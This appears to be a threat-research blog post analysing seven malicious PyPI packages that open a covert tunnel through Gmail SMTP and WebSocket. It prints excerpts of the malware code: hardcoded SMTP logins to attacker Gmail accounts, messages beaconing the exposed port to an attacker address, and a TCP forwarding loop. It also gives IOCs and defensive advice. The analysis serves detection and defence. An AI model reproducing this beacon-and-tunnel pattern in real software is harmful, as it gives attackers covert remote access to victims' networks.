Research
Olivia Brown
April 30, 2025
Socket’s Threat Research Team uncovered malicious Python packages designed to create a tunnel via Gmail. The threat actor’s email is the only potential clue as to their motivation, but once the tunnel is created, the threat actor can exfiltrate data or execute commands that we may not know about through these packages. These seven packages:
use Gmail, making these attempts less likely to be flagged by firewalls and endpoint detection systems since SMTP is commonly treated as legitimate traffic.
These packages have since been removed from the Python Package Index (PyPI).
Coffin-Codes-Pro#Coffin-Codes-Pro establishes a connection to Gmail’s SMTP server using hardcoded credentials, namely sphacoffin@gmail[.]comand a password. It then sends a message to a second email address, blockchain[.]bitcoins2020@gmail[.]com politely and demurely signaling that the implant is working.
import sys
import json
import threading
import smtplib
import websockets
import ssl
import certifi
from .tcp import Client
ssl_context = ssl.create_default_context()
ssl_context.load_verify_locations(certifi.where())
srv = smtplib.SMTP_SSL("smtp.gmail.com", 465)
srv.ehlo()
srv.login("sphacoffin@gmail.com", "[redacted]")
srv.sendmail("sphacoffin@gmail[.]com",
"blockchain.bitcoins2020@gmail[.]com",
"SHIT INCOMIN")Next, it establishes a WebSocket connection to the given URI, acting as the command and control channel. It then receives a message containing tunnel port instructions and emails the public_server_portto the original email.
async def open_tcp_tunnel(ws_uri, remote_server_host, local_server_port):
async with websockets.connect(ws_uri, ssl=ssl_context) as websocket:
message = json.loads(await websocket.recv())
local_server_host = '127.0.0.1'
public_server_port = message["public_server_port"]
private_server_port = message["private_server_port"]
srv.sendmail("sphacoffin@gmail[.]com",
"blockchain.bitcoins2020@gmail[.]com",
str(public_server_port))
#print(f"\\033[32m{'Tunnel Status':<25}Online\\033[00m")
#print(f"{'Forwarded':<25}{f'{remote_server_host}:{public_server_port} → 127.0.0.1:{local_server_port}'}")Finally, it initiates a TCP forwarder between the remote and local hosts. For each new connection instruction received via WebSocket, spawns a thread to process it through the tunnel. The Client class is defined in tcp[.]py if you would like to dive further. Essentially, it allows for bidirectional data forwarding through an interactive communication, effectively punching through firewalls and NAT because the tunnel is initiated outbound from the infected machine through gmail.
client = Client(
remote_server_host=remote_server_host,
remote_server_port=private_server_port,
local_server_host=local_server_host,
local_server_port=local_server_port,
)
while True:
message = json.loads(await websocket.recv())
#print("New Connection +1")
threading.Thread(target=client.process,
args=(message, websocket)).start()Previously, threat actors used this tactic to siphon private keys to Solana. This package also seems to be related to bitcoin due to their hardcoded credentials. However, the attacker could access internal dashboards, APIs, or admin panels that are only accessible to the victim. The attacker could transfer files, execute shell commands or scripts, or harvest credentials. The attacker could even use this access to pivot further into the network.
Coffin-Codes-Net2#This is the most recent package listed on the PyPI page, even more recent (by a day) than the malicious package found by Socket’s Threat Research Team.
srv = smtplib.SMTP_SSL("[smtp[.]gmail[.]com](<http://smtp.gmail.com/>)", 465)
srv.ehlo()
srv.login("[hackingbsb@gmail[.]com](<mailto:hackingbsb@gmail.com>)", "{redacted}")
srv.sendmail("[sphacoffin@gmail[.]com](<mailto:sphacoffin@gmail.com>)",
"[blockchain.bitcoins2020@gmail[.]com](<mailto:blockchain.bitcoins2020@gmail.com>)", "SHIT INCOMIN")
Again, we see the actor create a secure SSL connection to gmail’s SMTP server using port 465. This implies that the script will send out emails automatically without any user action or visibility. It then authenticates to the Gmail SMTP server using hard coded credentials, hackingbsb@gmail[.]com and the same password. Next it sends, again, a very polite and demure plain text message, from sphacoffin@gmail[.]com to blockchain[.]bitcoins2020@gmail[.]com. Finally, it sends the forwarded port number. The attacker can now externally discover what port the user's machine is exposing through the tunnel, possibly for further exploitation.
Coffin-Codes-NET#Here, the logic is overall similar to the malicious package.
srv = smtplib.SMTP_SSL("[smtp.gmail.com](<http://smtp.gmail.com/>)", 465)
srv.ehlo()
srv.login("[btcchain2@gmail[.]com](<mailto:btcchain2@gmail.com>)", "{redacted}")
srv.sendmail("[sphacoffin@gmail.com](<mailto:sphacoffin@gmail.com>)", "[blockchain[.]bitcoins2020@gmail[.]com](<mailto:blockchain.bitcoins2020@gmail.com>)",
"SHIT INCOMIN")
srv.sendmail("[sphacoffin@gmail[.]com](<mailto:sphacoffin@gmail.com>)", "[blockchain[.]bitcoins2020@gmail[.]com](<mailto:blockchain.bitcoins2020@gmail.com>)",
str(public_server_port))This code is nearly identical in functionality and structure to the one above, but with one clear difference. This one logins to btcchain2@gmail[.]com. Since this package is from February 2022 according to PyPI, we can conclude this threat actor has been working on this exploit for at least three years.
Coffin-Codes-2022#Poorly named as the last release according to PyPI was in 2021, Coffin-Codes-2022 uses the same logic but with the email sender sphacoffin@gmail[.]com as the authenticated account.
srv = smtplib.SMTP_SSL("[smtp[.]gmail[.]com](<http://smtp.gmail.com/>)", 465)
srv.ehlo()
srv.login("[sphacoffin@gmail[.]com](<mailto:sphacoffin@gmail.com>)", "{redacted}")
srv.sendmail("[sphacoffin@gmail[.]com](<mailto:sphacoffin@gmail.com>)",
"[blockchain[.]bitcoins2020@gmail[.]com](<mailto:blockchain.bitcoins2020@gmail.com>)", "SHIT INCOMIN")Notably, the threat actor uses the same password every time.
Coffin2022#Similarly poorly named as the last release, according to PyPI, was again in 2021, and is essentially identical to Coffin-Codes-2022.
srv.login("[sphacoffin@gmail[.]com](<mailto:sphacoffin@gmail.com>)", "{redacted}")
srv.sendmail("[sphacoffin@gmail[.]com](<mailto:sphacoffin@gmail.com>)",
"[blockchain[.]bitcoins2020@gmail[.]com](<mailto:blockchain.bitcoins2020@gmail.com>)", "SHIT INCOMIN")
srv.sendmail("[sphacoffin@gmail[.]com](<mailto:sphacoffin@gmail.com>)",
"[blockchain[.]bitcoins2020@gmail[.]com](<mailto:blockchain.bitcoins2020@gmail.com>)", str(public_server_port))Coffin-Grave#Coffin-Grave, released at the same time as Coffin2022 and Coffin-Codes-2022, is functionally identical to them with no new IOCs.
cfc-bsb#This is the oldest and least malicious version, last released Mar 17, 2021.
This package implements an asynchronous WebSocket-based HTTP tunneling tool, similar to Ngrok, but with branding that continues the “Coffin Codes” theme. It connects to wss[://]open[.]jprq[.]live and proxies traffic to a local HTTP service. It serializes/de-serializes messages using JSON and Base64 rather than BSON. While this version lacks the malicious email exfiltration logic of previous variants, it retains suspicious traits such as:
These traits enable abuse for remote access, data smuggling, or botnet communication, and constitute a security risk even in the absence of exfiltration code.
In this code, there is no email exfiltration via smtplib, no hardcoded credentials, and no overt port leakage
This makes it less malicious than previous variants, but still risky due to its potential for covert network tunneling and unverified message handling.
The unverified linked GitHub through the PyPI site no longer exists. If you edit the link https[://]github.com[/]azimjohn[/]jprq-py to https[://]github.com[/]azimjohn[/]jprq, a members-only service to expose local services to the internet with 24 contributors, 1.3k stars, and 178 forks. There is some likelihood, therefore, that the GitHub link for this package may have pointed to a package impersonating the legitimate jprq tool, or was otherwise intended to associate this package with it.
Watch for unusual outbound connections, especially SMTP traffic, since attackers can use legitimate services like Gmail to steal sensitive data. Do not trust a package solely because it has existed for more than a few years without being taken down. To protect your codebase, always verify package authenticity by checking download counts, publisher history, and GitHub repository links. Regular dependency audits help catch unexpected or malicious packages early. Keep strict access controls on private keys, carefully limiting who can view or import them in development. Use isolated, dedicated environments when testing third-party scripts to contain potentially harmful code.
The Socket GitHub app provides an excellent defense by scanning python dependencies in pull requests, catching malicious or typosquatted packages before they enter your project. The Socket CLI delivers real-time analysis during npm installs for local development and CI pipelines. The Socket browser extension seamlessly scans for suspicious packages while you browse PyPI or GitHub, highlighting threats instantly.
T1102.002 - Web Service: Bidirectional Communication
blockchain[.]bitcoins2020@gmail[.]comsphacoffin@gmail[.]combtcchain2@gmail[.]comhackingbsb@gmail[.]comSubscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Security News
Open source maintainers are urging GitHub to let them block Copilot from submitting AI-generated issues and pull requests to their repositories.
Research
Security News
Malicious Koishi plugin silently exfiltrates messages with hex strings to a hardcoded QQ account, exposing secrets in chatbots across platforms.
Research
Security News
Malicious PyPI checkers validate stolen emails against TikTok and Instagram APIs, enabling targeted account attacks and dark web credential sales.